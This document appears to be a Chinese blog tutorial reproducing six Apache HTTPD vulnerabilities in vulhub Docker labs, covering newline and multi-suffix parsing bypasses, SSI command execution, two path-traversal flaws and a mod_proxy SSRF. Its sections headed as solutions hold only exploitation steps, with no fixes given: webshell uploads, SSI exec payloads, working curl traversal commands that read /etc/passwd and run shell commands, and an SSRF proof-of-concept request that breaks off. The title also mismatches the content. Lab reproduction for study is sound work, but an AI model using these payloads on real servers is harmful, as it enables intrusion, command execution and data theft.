某系统模板注入漏洞分析

目录

一、Apache HTTPD 换行解析漏洞

漏洞编号：CVE-2017-15715

①环境启用

②编译和运行

③访问漏洞环境

④解决方法

二、Apache HTTPD 多后缀解析漏洞

①环境启用

②运行环境

③访问漏洞环境

④解决方法

三、Apache SSI 远程命令执行漏洞

①环境启用

②运行一个支持SSI与CGI的Apache服务器

③访问漏洞环境

④解决方法

四、Apache HTTP 路径穿越漏洞

漏洞编号：CVE-2021-41773

①环境启用

②执行以下命令以启动易受攻击的 Apache HTTP 服务器

③访问漏洞环境

④解决方法

五、Apache HTTP 路径穿越漏洞

漏洞编号：CVE-2021-42013

①环境启用

②执行以下命令以启动易受攻击的 Apache HTTP 服务器

③访问漏洞环境

④解决方法

六、Apache HTTP SSRF漏洞

漏洞编号：CVE-2021-40438

①环境启用

②执行以下命令以启动易受攻击的 Apache HTTP 服务器：

③访问漏洞环境

④解决方法

免费领取安全学习资料包！?编辑

---

一、Apache HTTPD 换行解析漏洞

漏洞编号：CVE-2017-15715

Apache HTTPD是一款HTTP服务器，它可以通过mod_php来运行PHP网页。

其2.4.0~2.4.29版本中存在一个解析漏洞。

在解析PHP时，1.php\x0A将被按照PHP后缀进行解析，导致绕过一些服务器的安全策略。

①环境启用

cd vulhub/httpd/CVE-2017-15715

②编译和运行

docker-compose build
docker-compose up -d

③访问漏洞环境

http://192.168.200.3:8080/

编写一句话木马上传文件123.php，上传都是失败的

④解决方法

在123.php后面插入一个\x0A（注意，不能是\x0D\x0A，只能是一个\x0A），不再拦截，这里只需要选中0d，右击选择insert byte…后，输入0a即可插入至里面，然后发送。

二、Apache HTTPD 多后缀解析漏洞

漏洞概述：Apache HTTPD 支持一个文件拥有多个后缀，并为不同后缀执行不同的指令，比如配置文件： AddHandler application/x-httpd-php .php。在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。

①环境启用

cd /vulhub/httpd/apache_parsing_vulnerability

②运行环境

docker-compose up -d

③访问漏洞环境

http://192.168.200.3

④解决方法

<?=phpinfo()?>

白名单检查文件后缀的上传组件，上传完成后并未重命名。我们可以通过上传文件名为xxx.php.jpg或xxx.php.jpeg的文件，利用Apache解析漏洞进行getshell。

三、Apache SSI 远程命令执行漏洞

在测试任意文件上传漏洞的时候，目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持，我们可以上传一个shtml文件，并利用

<!--#exec cmd="id" -->?语法执行任意命令

①环境启用

cd /vulhub/httpd/ssi-rce

②运行一个支持SSI与CGI的Apache服务器

docker-compose up -d

③访问漏洞环境

http://192.168.200.3:8080/upload.php

④解决方法

正常上传PHP文件是不允许的，我们可以上传一个shell.shtml文件：

<!--#exec cmd="ls" --> # 可以使用其他指令

四、Apache HTTP 路径穿越漏洞

漏洞编号：CVE-2021-41773

在其2.4.49版本中，引入了一个路径穿越漏洞，满足下面两个条件的Apache服务器将会受到影响：

• 版本等于2.4.49
• 穿越的目录允许被访问（默认情况下是不允许的）

攻击者利用这个漏洞，可以读取位于Apache服务器Web目录以外的其他文件，或者读取Web目录中的脚本文件源码，或者在开启了cgi或cgid的服务器上执行任意命令

①环境启用

cd /vulhub/httpd/CVE-2021-41773

②执行以下命令以启动易受攻击的 Apache HTTP 服务器

docker-compose build
docker-compose up -d

③访问漏洞环境

http://192.168.200.3:8080/

④解决方法

使用如下CURL命令来发送Payload（注意其中的/icons/必须是一个存在且可访问的目录）：

curl -v --data "echo;id" 'http://192.168.200.3:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

在服务端开启了cgi或cgid这两个mod的情况下，这个路径穿越漏洞将可以执行任意命令：

curl -v --data "echo;id" 'http://192.168.200.3:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

curl -v --data "echo;whoami" 'http://192.168.200.3:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

五、Apache HTTP 路径穿越漏洞

漏洞编号：CVE-2021-42013

Apache HTTP 服务器项目旨在为包括 UNIX 和 Windows 在内的现代操作系统开发和维护开源 HTTP 服务器。

CVE-2021-42013 是一个漏洞，由 CVE-2021-41773 修复不完整导致，攻击者可以使用路径遍历攻击将 URL 映射到类别名指令配置的目录之外的文件。

此漏洞影响 Apache HTTP Server 2.4.49 和 2.4.50，而不是早期版本。

①环境启用

cd /vulhub/httpd/CVE-2021-42013

②执行以下命令以启动易受攻击的 Apache HTTP 服务器

docker-compose build
docker-compose up -d

③访问漏洞环境

http://192.168.200.3:8080

④解决方法

Apache HTTP 服务器 2.4.50 修补了以前的 CVE-2021-41773 有效负载，例如 ，但它不完整。http://your:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

用于绕过修补程序（请注意，必须是现有目录）：.%%32%65/icons/，但我们可以使用.%%32%65进行绕过（注意其中的/icons/必须是一个存在且可访问的目录）：

curl -v --path-as-is http://192.168.200.3:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

已成功披露：/etc/passwd

服务端开启了cgi或cgid这两个mod的情况下，这个路径穿越漏洞将可以执行任意命令：

curl -v --data "echo;id" 'http://192.168.200.3:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

六、Apache HTTP SSRF漏洞

漏洞编号：CVE-2021-40438

Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.48及以前的版本中，mod_proxy模块存在一处逻辑错误导致攻击者可以控制反向代理服务器的地址，进而导致SSRF漏洞。

①环境启用

cd /vulhub/httpd/CVE-2021-40438

②执行以下命令以启动易受攻击的 Apache HTTP 服务器：

docker compose build
docker compose up -d

③访问漏洞环境

192.168.200.3:8080

④解决方法

构造POC：

GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA